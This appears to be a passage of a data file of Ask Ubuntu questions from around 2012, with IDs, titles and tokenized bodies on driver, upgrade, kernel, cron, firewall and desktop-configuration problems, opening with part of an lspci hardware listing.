parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin a routed to irq 42 region 0 : memory at c3600000 ( 64-bit , non-prefetchable ) [ size=64k ] capabilities : < access denied > kernel driver in use : xhci_hcd 00:16.0 communication controller : intel corporation panther point mei controller # 1 ( rev 04 ) subsystem : dell device 056e control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin a routed to irq 44 region 0 : memory at c3614000 ( 64-bit , non-prefetchable ) [ size=16 ] capabilities : < access denied > kernel driver in use : mei kernel modules : mei 00:1a.0 usb controller : intel corporation panther point usb enhanced host controller # 2 ( rev 04 ) ( prog-if 20 [ ehci ] ) subsystem : dell device 056e control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin a routed to irq 16 region 0 : memory at c3619000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : < access denied > kernel driver in use : ehci_hcd 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) subsystem : dell device 056e control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 47 region 0 : memory at c3610000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel 00:1c.0 pci bridge : intel corporation panther point pci express root port 1 ( rev c4 ) ( prog-if 00 [ normal decode ] ) control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes bus : primary=00 , secondary=07 , subordinate=07 , sec-latency=0 i/o behind bridge : 00003000-00003fff memory behind bridge : fff00000-000fffff prefetchable memory behind bridge : 00000000c3400000-00000000c34fffff secondary status : 66mhz- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- < serr- < perr- bridgectl : parity- serr- noisa- vga- mabort- > reset- fastb2b- pridisctmr- secdisctmr- disctmrstat- disctmrserren- capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:1c.1 pci bridge : intel corporation panther point pci express root port 2 ( rev c4 ) ( prog-if 00 [ normal decode ] ) control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes bus : primary=00 , secondary=08 , subordinate=08 , sec-latency=0 i/o behind bridge : 0000f000-00000fff memory behind bridge : c3500000-c35fffff prefetchable memory behind bridge : 00000000fff00000-00000000000fffff secondary status : 66mhz- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- < serr- < perr- bridgectl : parity- serr- noisa- vga- mabort- > reset- fastb2b- pridisctmr- secdisctmr- disctmrstat- disctmrserren- capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:1c.2 pci bridge : intel corporation panther point pci express root port 3 ( rev c4 ) ( prog-if 00 [ normal decode ] ) control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes bus : primary=00 , secondary=09 , subordinate=0e , sec-latency=0 i/o behind bridge : 00002000-00002fff memory behind bridge : c1000000-c1ffffff prefetchable memory behind bridge : 00000000c0000000-00000000c0ffffff secondary status : 66mhz- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- < serr- < perr- bridgectl : parity- serr- noisa- vga- mabort- > reset- fastb2b- pridisctmr- secdisctmr- disctmrstat- disctmrserren- capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:1d.0 usb controller : intel corporation panther point usb enhanced host controller # 1 ( rev 04 ) ( prog-if 20 [ ehci ] ) subsystem : dell device 056e control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin a routed to irq 23 region 0 : memory at c3618000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : < access denied > kernel driver in use : ehci_hcd 00:1f.0 isa bridge : intel corporation panther point lpc controller ( rev 04 ) subsystem : dell device 056e control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 capabilities : < access denied > kernel modules : itco_wdt 00:1f.2 sata controller : intel corporation panther point 6 port sata controller [ ahci mode ] ( rev 04 ) ( prog-if 01 [ ahci 1.0 ] ) subsystem : dell device 056e control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz+ udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin b routed to irq 41 region 0 : i/o ports at 5088 [ size=8 ] region 1 : i/o ports at 5094 [ size=4 ] region 2 : i/o ports at 5080 [ size=8 ] region 3 : i/o ports at 5090 [ size=4 ] region 4 : i/o ports at 5060 [ size=32 ] region 5 : memory at c3617000 ( 32-bit , non-prefetchable ) [ size=2k ] capabilities : < access denied > kernel driver in use : ahci 00:1f.3 smbus : intel corporation panther point smbus controller ( rev 04 ) subsystem : dell device 056e control : i/o+ mem+ busmaster- speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap- 66mhz- udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- interrupt : pin c routed to irq 10 region 0 : memory at c3615000 ( 64-bit , non-prefetchable ) [ size=256 ] region 4 : i/o ports at 5040 [ size=32 ] kernel modules : i2c-i801 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati thames xt/gl [ radeon hd 7600m series ] ( prog-if 00 [ vga controller ] ) subsystem : dell device 056e control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 45 region 0 : memory at a0000000 ( 64-bit , prefetchable ) [ size=256m ] region 2 : memory at c2000000 ( 64-bit , non-prefetchable ) [ size=128k ] region 4 : i/o ports at 4000 [ size=256 ] expansion rom at c2020000 [ disabled ] [ size=128k ] capabilities : < access denied > kernel driver in use : radeon kernel modules : radeon 07:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 07 ) subsystem : dell device 056e control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 43 region 0 : i/o ports at 3000 [ size=256 ] region 2 : memory at c3404000 ( 64-bit , prefetchable ) [ size=4k ] region 4 : memory at c3400000 ( 64-bit , prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : r8169 kernel modules : r8169 08:00.0 network controller : broadcom corporation device 4365 ( rev 01 ) subsystem : dell device 0016 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 11 region 0 : memory at c3500000 ( 64-bit , non-prefetchable ) [ size=32k ] capabilities : < access denied >
174886	unable to install wireless drivers	hi have just 'upgraded ' to ubuntu 12.04 from 11 . wireless connection worked fine prior to connection . in fact used wireless network to perform the 'upgrade ' . now computer does not recognize any wireless network and a driver search identifies a broadcom wireless driver that wo n't install ? what now ? downgrade to 11 ? ubuntu the only operating system on my hp probook 6550b .
174890	are the deb files stored in /var/cache important ?	i have nearly 800 mb of .deb files in cache folder ... . i went through other posts related to this query but i wan not convinced . should i just save all theses files somewhere ? i guess it wo n't affect anything ! !
174892	how to disable the download of language packs while installing kubuntu	i am installing kubuntu 12.04 from a usb drive and it is downloading a lot of language packs . my internet speed is too slow and it would take another 45 minutes to install them . the cancel button does n't seem to work . how can i stop downloading the language packs and complete my installation ?
174895	installed java 6 in downlods folder what should i do now ?	i am new to linux and i used instruction specified in oracle 's documentation on how to install java on linux . now when i checked with java -version i got invalid command message . after searching in different directories i found java directories in downloads folder . please suggest what should i do a new install or any other option ?
174896	how to uninstall ubuntu 7 and install ubuntu 12.04 ?	i have ubuntu 7 installed . i downloaded ubuntu 12.4 and i created a bootable cd . but when i try to boot from it , and start the installation , it would n't work , why ? how can i remove ubuntu 7 using windows xp and install the newer version ?
174897	old kernel in grub and /boot but not uninstallable	i have kernel 2.6.38 still visible in the grub menu and i see abi-2.6.38-11-generic config-2.6.38-11-generic initrd.img-2.6.38-11-generic vmlinuz-2.6.38-11-generic ( among the respective files for the recent kernel ) in /boot . but when i try to find the package with dpkg i do n't see it : $ dpkg -l | grep linux-image 2338 : rc linux-image-3.0.0-14-generic 3.0.0-14.23 linux kernel image for version 3.0.0 on x86/x86_64 2339 : rc linux-image-3.0.0-15-generic 3.0.0-15.26 linux kernel image for version 3.0.0 on x86/x86_64 2340 : rc linux-image-3.0.0-16-generic 3.0.0-16.29 linux kernel image for version 3.0.0 on x86/x86_64 2341 : ii linux-image-3.2.0-29-generic 3.2.0-29.46 linux kernel image for version 3.2.0 on 64 bit x86 smp 2342 : ii linux-image-generic 3.2.0.29.31 generic linux kernel image how can i remove these old kernel files safely ? i am running ubuntu 12.04 , uname -a reads linux xyz 3.2.0-29-generic # 46-ubuntu smp fri jul 27 17:03:23 utc 2012 x86_64 x86_64 x86_64 gnu/linux
174898	better workspace switcher ?	i am running ubuntu 12.04 with default install of unity . the workspace switcher icon could have been better . the function it does is accomplished by a keystroke . the icon remains the same ( two windows on desktop 1 ) whether there are windows on other desktops . is there a better workspace switcher - one that represents windows on desktops in real time ? alternatively , can i , and how can i turn the workspace switcher icon off ?
174899	how can i fix missing key presses when running ubuntu as a vm under osx ?	environment osx 10.7.4 mid-2010 imac virtualbox 4.1.18 ubuntu precise pangolin ( all updates applied ) issue i have created a fresh virtualbox vm and installed precise from the standard desktop iso . as a part of the install i selected the 'english uk ( mac international ) ' key-map . all of the keys seem to be emitting the correct character , however , for some keys a character will not be registered until i have pressed the key twice . for example , the first time i press the ` key no character appears at the terminal prompt . however , the second time works . this also happens for some other keys and shift combinations - ie ~ ( shift + ` ) is also affected . further info this does not appear to be a vm issue . i installed precise under vmware fusion and the exact same problem seems to occur . it is n't related to the speed that i 'm typing . i can press the key , wait a couple seconds , then press it again and i get the same behaviour . switching to an alternative keyboard layout ( english uk extended winkeys ) the problem persists for the backtick character ( you must press the ยง key on the keyboard ) . pressing the ` key emits a character ( ) immediately . in other words the problem seems to be related to specific characters , rather than the hardware codes emitted by particular keys . xev output first keypress : keypress event , serial 30 , synthetic no , window 0x4a00001 , root 0x138 , subw 0x0 , time 3935772 , ( 317,33 ) , root : ( 320,141 ) , state 0x0 , keycode 94 ( keysym 0xfe50 , dead_grave ) , same_screen yes , xlookupstring gives 1 bytes : ( 60 ) `` ` '' xmblookupstring gives 0 bytes : xfilterevent returns : true keyrelease event , serial 33 , synthetic no , window 0x4a00001 , root 0x138 , subw 0x0 , time 3935884 , ( 317,33 ) , root : ( 320,141 ) , state 0x0 , keycode 94 ( keysym 0xfe50 , dead_grave ) , same_screen yes , xlookupstring gives 1 bytes : ( 60 ) `` ` '' xfilterevent returns : false second keypress : keypress event , serial 33 , synthetic no , window 0x4a00001 , root 0x138 , subw 0x0 , time 3939630 , ( 317,33 ) , root : ( 320,141 ) , state 0x0 , keycode 94 ( keysym 0xfe50 , dead_grave ) , same_screen yes , xlookupstring gives 1 bytes : ( 60 ) `` ` '' xmblookupstring gives 0 bytes : xfilterevent returns : true keypress event , serial 33 , synthetic no , window 0x4a00001 , root 0x138 , subw 0x0 , time 3939630 , ( 317,33 ) , root : ( 320,141 ) , state 0x0 , keycode 0 ( keysym 0x60 , grave ) , same_screen yes , xlookupstring gives 0 bytes : xmblookupstring gives 1 bytes : ( 60 ) `` ` '' xfilterevent returns : false keyrelease event , serial 33 , synthetic no , window 0x4a00001 , root 0x138 , subw 0x0 , time 3939777 , ( 317,33 ) , root : ( 320,141 ) , state 0x0 , keycode 94 ( keysym 0xfe50 , dead_grave ) , same_screen yes , xlookupstring gives 1 bytes : ( 60 ) `` ` '' xfilterevent returns : false third keypress : keypress event , serial 33 , synthetic no , window 0x4a00001 , root 0x138 , subw 0x0 , time 3956078 , ( 317,33 ) , root : ( 320,141 ) , state 0x0 , keycode 94 ( keysym 0xfe50 , dead_grave ) , same_screen yes , xlookupstring gives 1 bytes : ( 60 ) `` ` '' xmblookupstring gives 0 bytes : xfilterevent returns : true keyrelease event , serial 33 , synthetic no , window 0x4a00001 , root 0x138 , subw 0x0 , time 3956214 , ( 317,33 ) , root : ( 320,141 ) , state 0x0 , keycode 94 ( keysym 0xfe50 , dead_grave ) , same_screen yes , xlookupstring gives 1 bytes : ( 60 ) `` ` '' xfilterevent returns : false the additional `` grave '' key press only seems to be emitted every other physical key press .
174905	opensource ati driver - fan running at full speed all the time	i know this is a common problem and have read other topics but could n't resolve . anyways yesterday i found a solution - i have 2 graphic cards ( hybrid ) and they were both on . so i turned one off and installed jupiter for power management and from there on the fans were quiet and i was happy as hell . however ( : ) ) , yesterday evening i also updated the system and the fan and it 's noise came back . i checked whether i am using only 1 graphics card and i am . c0dehunter @ mintbox ~ $ sudo lshw -c video [ sudo ] password for c0dehunter : *-display description : vga compatible controller product : rs780m/rs780mn [ mobility radeon hd 3200 graphics ] vendor : hynix semiconductor ( hyundai electronics ) physical id : 5 bus info : pci @ 0000:01:05.0 version : 00 width : 32 bits clock : 33mhz capabilities : pm msi vga_controller bus_master cap_list rom configuration : driver=radeon latency=0 resources : irq:18 memory : c0000000-cfffffff ioport : c000 ( size=256 ) memory : fbcf0000-fbcfffff memory : fbb00000-fbbfffff maybe the problem is ( false ) temp reading from gpu ? c0dehunter @ mintbox ~ $ sensors acpitz-virtual-0 adapter : virtual device temp1 : +44.0°c ( crit = +105.0°c ) k10temp-pci-00c3 adapter : pci adapter temp1 : +47.0°c ( high = +70.0°c ) ( crit = +115.0°c , hyst = +110.0°c ) radeon-pci-0200 adapter : pci adapter temp1 : +127.5°c the thing that is weird is that if i boot into windows the fan is still at full power ( previously it was n't ) . did i f -- - up my hardware with software ? : ) //oh , yes - i forgot to mention that my laptop is not hot at all . the temps are about 50°c .
174906	how is rm command different from the delete button ?	i read from a book where it says , the command rm deletes the inode and not the file . which means if i delete with the rm command , then it can not be restored . i 'm very new to ubuntu environment . now my doubt is , how does the del key works ? it is not deleting the inode as far as i am concerned , because i can restore it from my trash folder . so am i right to say that del key is doing a mv command to trash folder leaving the inode unchanged ? or am i missing something here ?
174908	wireshark - allow non-root user to sniff usb traffic	i 'm trying to capture data transferred across a usb connection to reverse-engineer the protocol used . i 'm using wireshark to do this , which explicitly warns against running as root . so far , i 've installed wireshark and run the following commands : sudo dpkg-reconfigure wireshark-common to allow members of the wireshark group ( me ) to access network interfaces sudo chmod +x /usr/bin/dumpcap not sure what that does , but i think dumpcap was previously only executable by root . sudo usermod -ag wireshark ( me ) to add me to the wireshark group this allows me to sniff network interfaces without running as root , but i still ca n't see the usb interfaces . running gksudo wireshark runs wireshark as root and i can see usb interfaces then . is there a step i 've missed to make usb sniffing possible for non-root users ? i do n't mind having to run wireshark as root for now , but it seems like i may as well set it up properly .
174911	help with installing ubuntu from usb stick	i used my desktop computer to create a bootable usb drive on a 8gb flash drive . i placed the usb in my laptop , which has no current os , and i received the following error : syslinux 4.06 edd 4.06-pre1 copyright ( c ) 1994-2011 h. peter anvin et al edd : error 0100 reading sector 536872960 what is going on and what do i do now ?
174914	garmin gpsmap 76csx gps usb connection	now that i 've discovered this useful place for solving problems i 'd like to find the solution to my next issue . i used to be able to connect my garmin gpsmap 76csx by usb to my old pc with ubuntu , it was a complicated solution ( for me ) but sadly i ca n't find it again for this pc . can anyone direct me to a fix . i 'm using ubuntu 12.04 .
174917	cheese will not start in 12.04	i start cheese on my 12.04 installation . i have used it before in my previous installations but since i upgraded to 12.04 , no joy ! i have a geforce gt-520 video card with the `` recommended '' additional proprietary drivers installed and activated . i tried to run cheese from the terminal and got the following errors : dozens of these errors : ( cheese:5467 ) : gtk-warning ** : theme parsing error : gnome-applications-light.css:42:23 : not using units is deprecated . assuming 'px ' . about a dozen of these errors : ( cheese:5467 ) : gtk-warning ** : attempting to add a widget with type gtkimage to a gtktogglebutton , but as a gtkbin subclass a gtktogglebutton can only contain one widget at a time ; it already contains a widget of type gtklabel only one of these errors : ( cheese:5467 ) : critical ** : cheese_camera_device_get_uuid : assertion cheese_is_camera_device ( device ) ' failed segmentation fault ( core dumped )
174918	ubuntu laging and can i turn off root password ?	hello i have problem with ubuntu 12.04 lts , it 's always give me a lag and i do n't know what to do . my laptop i think is fast , so how can you help me ? and one other problem , how to remove password for admin , because system always request the password , for everything ? ?
174921	skype not always loading as a applet in fluxbox	i 've put skype & in my .fluxbox/startup file , and skype indeed does start when i power the computer on . the problem is , it often does n't load as an applet . you can see what i mean on this screenshot : on this rare occasion , it did load up in that little bar , but , as i 've said , that happens rarely . it 's very weird because skype does start , its window does show and all , but that small icon ( usually ) does n't . why is that ? this is my startup file : # ! /bin/sh x-terminal-emulator & nm-applet & gnome-sound-applet & conky & batti & skype & fbsetbg -f .fluxbox/wallpapers/w1.jpg exec fluxbox
174923	unity dash wo n't display applications and system settings does n't open either !	i have changed the language of ubuntu to my local but after logout and login the dash does n't display any app . and if i want to open system settings from system menu it does n't open either ! i 've tried many solutions like : restart the computer , rm ~/.cache/software-center -r , unity -- reset & , unity -- replace & , re-install unity-place-applications and unity-place-files , ~/.local/share ; rm -rf zeitgeist , sudo chmod 774 /usr/share/applications/* none of these had solve the problem . what should i do ?
174926	how to rename gnome-shell launcher application name without alacarte ?	pity that gnome-shell 's launcher shows only a few characters of the application 's name . that 's why i 'd like to rename e.g . `` web-browser firefox '' into just `` firefox '' . previous versions of gnome had a working alacarte program which allowed to do what i need . now alacarte shows this error while trying to enter the applications preferences : file `` /usr/share/alacarte/alacarte/mainwindow.py '' , line 391 , in on_edit_properties_activate process = subprocess.popen ( [ 'gnome-desktop-item-edit ' , file_path ] , env=os.environ ) file `` /usr/lib/python2.7/subprocess.py '' , line 679 , in __init__ errread , errwrite ) file `` /usr/lib/python2.7/subprocess.py '' , line 1249 , in _execute_child raise child_exception how do i rename an application without alacarte ?
174937	main differences between fsck and chkdsk ?	what are the important differences between fsck and chkdsk , and which command will reduce and correct the most hard disk errors ?
174939	apt-get on a virtual server with no internet	i 've been trying to install a gcc compiler on a natty,10.04 64 ubuntu server . i do n't have an internet connection on it , i can only transfer files to it indirectly . i 've tried mounting an image of the full dvd on it , successfully ( i think ) by doing : mount -o loop /tmp/ubuntu-11.04-server-amd64.iso /media/ubuntu-11.04-server-amd64 apt-cdrom -d=/media/ubuntu-11.04-server-amd64/ add and i updated fstab but when i tried to apt-get from it ( all i need is a source from which i can apt-get build essential ) it still tried to connect to the internet . also , when trying to install a package by running ./configure i got : '' no acceptable c compiler found in $ path '' how can can i do this without a connection to the internet ?
174945	problem with installation of rawtherapee	when i want to install rawtherapee from software center , it will end with this message install archives ( ) failed : ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 262697 files and directories currently installed . ) unpacking rawtherapee ( from ... /rawtherapee_3.0.0~dfsg1-1build1_amd64.deb ) ... dpkg : error processing /var/cache/apt/archives/rawtherapee_3.0.0~dfsg1-1build1_amd64.deb ( -- unpack ) : trying to overwrite '/usr/share/rawtherapee/images/curvetype-nurbs.png ' , which is also in package rawtherapee-data 4.0.9-2 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/rawtherapee_3.0.0~dfsg1-1build1_amd64.deb error in function : can anyone help with this ?
174947	ca n't use wireless internet through usb	i 'm using ubuntu 10.04 ( lucid lynx ) . i want to use wireless internet on ubuntu and thus need to install idea net setter ( isp ) for the same . in the usb drive i can find some files , one of the files read as below.. : -- how to install -- -- -- -- -- -- -- -- -- -- -- you need login as root * run `` tar jxvf linux_install.tar.bz2 '' run ./install in terminal to install mobilepartner eg : # bash //install if you had installed this software in your system before , you will get a prompt : `` the software is exist , do you want overwrites ? ( [ y ] / [ n ] ) '' , enter `` y '' to overwrites or `` n '' to exit . if you do not had installed this software in your system before , you will get a prompt : `` please input the install path [ /usr/local/mobile_partner ] : '' . then you can input install path ( fullpath ) , or you may using the default path ( /usr/local/mobile_partner ) by press enter direct finish installing -- how to run -- -- -- -- -- -- -- -- -- -- -- -- -- * from shortcut in desktop run mobilepartner in your install path eg : # //mobilepartner plug in your device , it will run automatically ( not supported in xandros ) i inserted the usb and tried to change my directory but it did n't work : vipul @ vipul-desktop : ~ $ cd / vipul @ vipul-desktop : / $ cd media vipul @ vipul-desktop : /media $ ls idea net setter vipul @ vipul-desktop : /media $ cd idea net setter bash : cd : idea : no such file or directory then i directly pasted tar jxvf linux_install.tar.bz2 in the terminal and it did n't work : vipul @ vipul-desktop : /media $ tar jxvf linux_install.tar.bz2 tar : linux_install.tar.bz2 : can not open : no such file or directory tar : error is not recoverable : exiting now tar : child returned status 2 tar : exiting with failure status due to previous errors then i copied the whole installation program into my home folder , changed directories , ran it again and still nothing happened : vipul @ vipul-desktop : ~ $ cd idea net setter vipul @ vipul-desktop : ~/idea $ ls autorun.exe autorun.sh install_linux startup.ico autorun.inf idea net setter linux sysconfig.dat vipul @ vipul-desktop : ~/idea $ tar jxvf linux_install.tar.bz2 tar : linux_install.tar.bz2 : can not open : no such file or directory tar : error is not recoverable : exiting now tar : child returned status 2 tar : exiting with failure status due to previous errors vipul @ vipul-desktop : ~/idea $ cd linux vipul @ vipul-desktop : ~/idea/linux $ tar jxvf linux_install.tar.bz2 tar : linux_install.tar.bz2 : can not open : no such file or directory tar : error is not recoverable : exiting now tar : child returned status 2 tar : exiting with failure status due to previous errors vipul @ vipul-desktop : ~/idea/linux $ ls 7zr datacard_verify mobilepartner.bin sysconfig.dat data.bin install readme.txt please help . i 'm clueless and do n't know what to do ?
174956	after making partition , i could n't see device ( /dev/sda3 )	i made a partiion sda3 using fdisk , but after that , i do n't see /dev/sda3 . if i fdisk -l , i see this . test @ jylenovo : ~ $ sudo fdisk -l disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000ded3d device boot start end blocks id system /dev/sda1 * 2048 292968447 146483200 83 linux /dev/sda2 945522686 976771071 15624193 5 extended /dev/sda3 292968448 800000000 253515776+ 83 linux /dev/sda5 945522688 976771071 15624192 82 linux swap / solaris partition table entries are not in disk order but , i do n't see /dev/sda3 like this . test @ jylenovo : ~ $ ls /dev/sda3 -l ls : can not access /dev/sda3 : no such file or directory what am i missing ?
174965	is it possible to know , how many pen drive connected with pc for one day ?	because , i shared files but i do n't remember how many person .
174966	how to change color of the snapping window from default orange	i was wondering if it is possible to change the color of the snapping windows from default orange to another color ?
174968	how does .desktop file exec field work ?	it 's been several months i 'm having this horrible problem . i 'm currently using unity 2d , and i manage my menu entries by using .desktop files , which is tiring . is there a better way to manage them ? anyway , the problem comes from the exec field . i 'm so tired ! i 've been fighting to resolve this problem for days ! it almost gave me a nervous-breakdown once . as an example , the latest entry i tried to add was an entry for a windows game ( using wine ) : [ desktop entry ] name=venus patrol 1.1 icon=/usr/share/icons/venuspatrol.jpg type=application categories=game ; exec=wine `` /home/lol/autres/programfiles/games/venus patrol 1.1/venus patrol.exe '' path= '' /home/lol/autres/programfiles/games/venus patrol 1.1 '' keywords=game ; indie ; jam ; terminal=true genericname=indie game by neil thapen originally made for tigsource cockpit competition 2009 i put directly executable programs and games ( no installation needed , mainly windows ones ) in `` /home/lol/autres/programfiles '' directory . i do n't like messing with root folders , as i 'm obliged to open the file manager as root and go through all the system folders . whether the path contains spaces or not , it does not work . whether i precise the environement wineprefix path or not , it does not work . i 've tried alacarte , but it does n't work as well . i 've been reading this , but it did n't help . please , help me , i need some help . do you have any ideas ? ps : ... well , yeah , i 'm a fussy person edit : so , after mr. gruber 's reply , i updated my .desktop file , without success : [ desktop entry ] name=venus patrol 1.1 icon=/usr/share/icons/venuspatrol.jpg type=application categories=game ; tryexec=/home/lol/autres/programfiles/games/venus\spatrol\s1.1/venus\spatrol.exe exec=wine `` /home/lol/autres/programfiles/games/venus patrol 1.1/venus patrol.exe '' path= '' /home/lol/autres/programfiles/games/venus patrol 1.1 '' keywords=game ; indie ; jam ; terminal=true genericname=indie game by neil thapen originally made for tigsource cockpit competition 2009 . whether i precise the path variable or not , as ever , it does not work . it may be related to wine ( wineprefix , this kind of things ) , as i ( supposedly ) eventually had the exec field well written .
174969	how to build a jenkins plugin ?	i 'm trying to write my own jenkins plugin . i 'm following the official instructions . however , when i get to the part for actually building the plugin , i get a test failure : tests in error : initializationerror ( injectedtest ) : com.sun.jna.native.open ( ljava/lang/string ; ) j full stack trace full output of mvn install $ mvn -version apache maven 3.0.4 maven home : /usr/share/maven java version : 1.6.0_24 , vendor : sun microsystems inc. java home : /usr/lib/jvm/java-6-openjdk-amd64/jre default locale : en_gb , platform encoding : utf-8 os name : `` linux '' , version : `` 3.2.0-29-generic '' , arch : `` amd64 '' , family : `` unix '' which jdk do i need to have installed ? do i need to set any environment variables ? how do i make it build properly ? i discovered that i did n't have libjna-posix-java installed , but i still get the same error after installation .
174972	upgrading from 10.04 to 12.04	when trying to upgrade to 12.04 from 10.04 , the update manager fails and gives me the following report : an unresolvable problem occurred while calculating the upgrade : e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . this can be caused by : * upgrading to a pre-release version of ubuntu * running the current pre-release version of ubuntu * unofficial software packages not provided by ubuntu if none of this applies , then please report this bug using the command 'ubuntu-bug update-manager ' in a terminal .
174973	how can i call system settings app from the terminal ?	how can i call system settings app from the terminal ? example if i want to run gnome ppp i just type : $ gnome-ppp and it will open , so how i can do this to run system settings tool ? -related !
174977	crontab suddenly stopped working	ok so here is my problem , i recently updated my server and change some jsp files which are used to do automatic announcements . the crontab has all the .sh files listed within it and the .sh files run the jsp files to display the announcements . after i finished updating the jsp files , i rebooted the server and ever since then the announcements have stopped running . i can run the .sh files via putty manually and they work perfectly fine so the changes i made to the jsp files are not the problem . i did some research before posting here and i checked the syslog for cron entries . up until the point i rebooted my server the cron service was running as it should . since the reboot there has been no entries in the syslog for cron . i 've tried rebooting the server again , i also tried restarting the cron service , i also even tried stopping the service completely and starting it again with no effect . i ca n't figure out why the cron service would suddenly stop working as nothing to do with cron or any of the operating files were touched during the update of my server . does anyone have any suggestions as to why it may have stopped working ? i 'm using ubuntu server 11.10
174981	how do i configure ufw to allow ssh on another port ?	i 'm having some difficulties at the moment with my ubuntu ssh server . the only title i could come up with summarizing my situation was too long so here is my problem : i recently discovered the firewall `` ufw '' command on ubuntu , now i am trying to configure so that when i use putty to connection via ssh to my ubuntu os , that i could only use a very specific port number and not the default port `` 22 '' . for some reason , i am being refused access on my newly chosen port . since i 'm still new to ubuntu and networking , i do n't quite understand what 's wrong , any advice ?
174985	a black screen when i try to install ubuntu 12.04 on my acer aspire 4736z , why ?	my laptop is acer aspire 4736z and installed windows 7 ultimate , and i want to install ubuntu 12.04 alongside windows 7 . when i try to install ubuntu 12.04 , the screen becomes black . then , when i turn off my laptop by pressing the power button , split second i can see the installation guide . it , s means the actual , installation process is running , but the screen is black , why did it happen ? what 's wrong ? please help me !
